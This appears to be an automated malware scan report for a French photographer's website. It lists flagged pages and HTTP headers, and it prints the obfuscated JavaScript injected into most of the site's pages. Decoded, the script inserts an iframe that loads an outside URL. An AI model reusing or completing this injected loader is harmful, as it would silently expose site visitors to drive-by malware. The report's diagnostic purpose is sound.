Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=caroff-photographe.fr
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://caroff-photographe.fr/ | 200 OK Content-Length: 12713 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,5f,5d,67,5c,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,5f,5d,67,5c,26,6b,6a,5b,18,35,18,1f,60,6c,6c,68,32,27,27,68,5b,6d,68,5c,59,6c,5d,26,6a,67,27,6f,68,25,61,66,5b,64,6d,5c,5d,6b,27,5b, Antivirus reports:
http://caroff-photographe.fr/includes/img.js | 200 OK Content-Length: 1084 Content-Type: application/javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://caroff-photographe.fr/index2.php?PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 15071 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): the same snippet as reported for http://caroff-photographe.fr/ above. Antivirus reports:
http://caroff-photographe.fr/galeries.php?cat=1&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 15368 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): the same snippet as reported for http://caroff-photographe.fr/ above. Antivirus reports:
http://caroff-photographe.fr/galeries.php?cat=15&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 8570 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): the same snippet as reported for http://caroff-photographe.fr/ above. Antivirus reports:
http://caroff-photographe.fr/galeries.php?cat=21&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 9161 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): the same snippet as reported for http://caroff-photographe.fr/ above. Antivirus reports:
http://caroff-photographe.fr/galeries.php?cat=13&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 10846 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): the same snippet as reported for http://caroff-photographe.fr/ above. Antivirus reports:
http://caroff-photographe.fr/livre/livre.php?PHPSESSID=8e2513ab927ed683a96229859315a734 | 403 Forbidden Content-Length: 217 Content-Type: text/html | clean |
http://caroff-photographe.fr/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://caroff-photographe.fr/liens.php?PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 9061 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): the same snippet as reported for http://caroff-photographe.fr/ above. Antivirus reports:
http://caroff-photographe.fr/prestations.php?PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 9007 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): the same snippet as reported for http://caroff-photographe.fr/ above. Antivirus reports:
http://caroff-photographe.fr/galerie.php?gal=29&PHPSESSID=8e2513ab927ed683a96229859315a734 | 200 OK Content-Length: 7990 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below): the same snippet as reported for http://caroff-photographe.fr/ above. Antivirus reports:
http://caroff-photographe.fr/includes/scripts/prototype.js | 200 OK Content-Length: 71261 Content-Type: application/javascript | clean |
http://caroff-photographe.fr/includes/scripts/scriptaculous.js?load=effects | 200 OK Content-Length: 2404 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: caroff-photographe.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 16:26:30 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: 90planBAK=R698931959; path=/; expires=Thu, 21-Aug-2014 17:39:21 GMT
Set-Cookie: 90plan=R1531048398; path=/; expires=Thu, 21-Aug-2014 17:45:59 GMT
Set-Cookie: PHPSESSID=8e2513ab927ed683a96229859315a734; path=/
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: caroff-photographe.fr
Referer: http://www.google.com/search?q=caroff-photographe.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.